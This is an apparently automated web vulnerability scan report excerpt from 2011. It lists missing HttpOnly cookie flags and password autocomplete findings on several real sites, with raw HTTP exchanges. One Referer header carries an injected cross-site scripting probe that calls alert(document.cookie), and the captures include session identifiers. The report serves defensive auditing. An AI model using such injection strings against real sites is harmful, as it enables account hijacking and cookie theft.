NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:10:47 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.81. http://www.intellicast.com/Local/Weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Local/Weather.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:10:47 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Local/Weather.aspx?location=USMI0020 HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.82. http://www.intellicast.com/Travel/CheapFlightsWidget.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Travel/CheapFlightsWidget.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Travel/CheapFlightsWidget.htm HTTP/1.1
Host: www.intellicast.com
Proxy-Connection: keep-alive
Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(document.cookie))%2223d5246f6f3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=42rfba55zy50y245eamzjj2q; CityId=USMI0020; RecentLocations=Alma, Michigan@USMI0020:; Pop=0; vw=1; NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Content-Location: http://www.intellicast.com/Travel/CheapFlightsWidget.htm
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Last-Modified: Mon, 15 Feb 2010 17:02:20 GMT
Accept-Ranges: bytes
ETag: "0f681a260aeca1:d07"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 09 Jan 2011 01:46:02 GMT
nnCoection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:11 GMT;path=/
Content-Length: 9446

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Intellicast
...[SNIP]...

10.83. http://www.intellicast.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.intellicast.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=42rfba55zy50y245eamzjj2q; CityId=USMI0020; RecentLocations=Alma, Michigan@USMI0020:; Pop=0; vw=1; NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660; __utmz=204854216.1294537574.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=204854216.674476420.1294537574.1294537574.1294537574.1; __utmc=204854216; __utmb=204854216.1.10.1294537574

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Content-Location: http://www.intellicast.com/favicon.ico
Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT
Accept-Ranges: bytes
ETag: "e4451aa460aeca1:d07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 09 Jan 2011 01:46:15 GMT
Cneonction: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=44113c293660;expires=Sun, 09-Jan-11 02:12:24 GMT;path=/

............ .h.......(....... ..... ................................................ ...p...........P.......................................................................p..........................
...[SNIP]...

10.84. http://www.peanutlabs.com/core.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 01:34:42 GMT; path=/; domain=.peanutlabs.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core.php?coreClass=IdCmd&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=&rewardAvailable=&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

10.85. http://www.peanutlabs.com/pl/profileSurveyRegister.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/pl/profileSurveyRegister.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 01:34:41 GMT; path=/; domain=.peanutlabs.com
pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.86. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/publisher/dashboard2/PublisherDashboard.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.87. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mt_imp=54267db83a49b89cd0644d669488302a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:13:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.88. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mt_imp=54267db83a49b89cd0644d669488302a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:13:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.89. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mt_imp=54267db83a49b89cd0644d669488302a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a; path=/
Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.90. http://www.pogo.com/action/pogo/lightreg.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightreg.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.91. http://www.pogo.com/games/connect.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/connect.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

com.pogo.recent=scrabble.2player.social.17fbdp; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:34:04 GMT; Path=/games/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/connect.jsp?game=scrabble&apid=autoratedrules&auto=PlayNow&rule=2player&tab=beginner HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

10.92. http://www.pogo.com/games/scrabble previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/scrabble

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:29:48 GMT; Path=/games/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.93. http://www.pogo.com/login/entry.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/entry.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

com.pogo.lkey=TRB7pR5lcxMFFwWzCn4zTAAAKME.; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.94. http://www.pogo.com/login/pogo/setCookie.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/pogo/setCookie.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:12 GMT; Path=/login

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.95. https://www.pogo.com/fbconnect/js.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/fbconnect/js.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.96. http://www.rockband.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rockband.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rockband.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.97. http://www.xanga.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xanga.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fp-promo-count=1:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.xanga.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11. Password field with autocomplete enabled previous next
There are 43 instances of this issue:

http://activity.livefaceonweb.com/
http://diythemes.com/thesis/
http://mail.cmsinter.net/Login.aspx
http://mail.cmsinter.net/Login.aspx
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://themeforest.net/user/freshface/portfolio
http://wordpress.org/extend/plugins/wp-pagenavi/
http://www.43things.com/person/
http://www.adbrite.com/mb/commerce/purchase_form.php
http://www.adbrite.com/mb/commerce/purchase_form.php
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/Pogo
http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
http://www.facebook.com/peanutlabs
https://www.facebook.com/connect/uiserver.php
https://www.facebook.com/login.php
http://www.gamespot.com/
http://www.mlive.com/
http://www.onestat.com/
http://www.pandora.com/login.vm
http://www.pandora.com/people/
http://www.peanutlabs.com/adminLogin.php
http://www.pogo.com/
http://www.pogo.com/account/verify-password.do
http://www.pogo.com/action/pogo/lightregview.do
https://www.pogo.com/action/pogo/signin.do
http://www.rockband.com/
http://www.weather.com/
http://www.weather.com/weather/local/48617
http://www.weather.com/weather/local/48858
http://www.weather.com/weather/local/48879
http://www.weather.com/weather/local/USMI0020
http://www.xanga.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://activity.livefaceonweb.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://activity.livefaceonweb.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://activity.livefaceonweb.com/default.aspx

The form contains the following password field with autocomplete enabled:

txtPass

Request

GET / HTTP/1.1
Host: activity.livefaceonweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. http://diythemes.com/thesis/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://diythemes.com
Path:	/thesis/

Issue detail

The page contains a form with the following action URL:

http://diythemes.com/amember/login.php

The form contains the following password field with autocomplete enabled:

amember_pass

Request

GET /thesis/ HTTP/1.1
Host: diythemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://mail.cmsinter.net/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.cmsinter.net
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

http://mail.cmsinter.net/Login.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

Response

11.4. http://mail.cmsinter.net/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.cmsinter.net
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL:

http://mail.cmsinter.net/Login.aspx?ReturnUrl=%2fDefault.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: mail.cmsinter.net
Proxy-Connection: keep-alive
Referer: http://www.cmswebdev.com/start/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 8179

<!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN" >
<html>
<head>
       <title>Login</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="C#"
...[SNIP]...
<body onload="CheckForParent(); SetFocus()">
       <form name="login" method="post" action="Login.aspx?ReturnUrl=%2fDefault.aspx" id="login">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
...[SNIP]...
<td style="HEIGHT: 21px"><input name="txtPassword" type="password" id="txtPassword" onkeypress="return stopEnter()" onfocus="ClearPassword()" tabIndex="4" maxlength="31" class="inputTextMedToLarge" /></td>
...[SNIP]...

11.5. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy2.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

11.9. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

11.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The page contains a form with the following action URL:

http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

The form contains the following password fields with autocomplete enabled:

passwordReg
passwordConfirmationReg

Request

Response

11.12. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The page contains a form with the following action URL:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:36 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
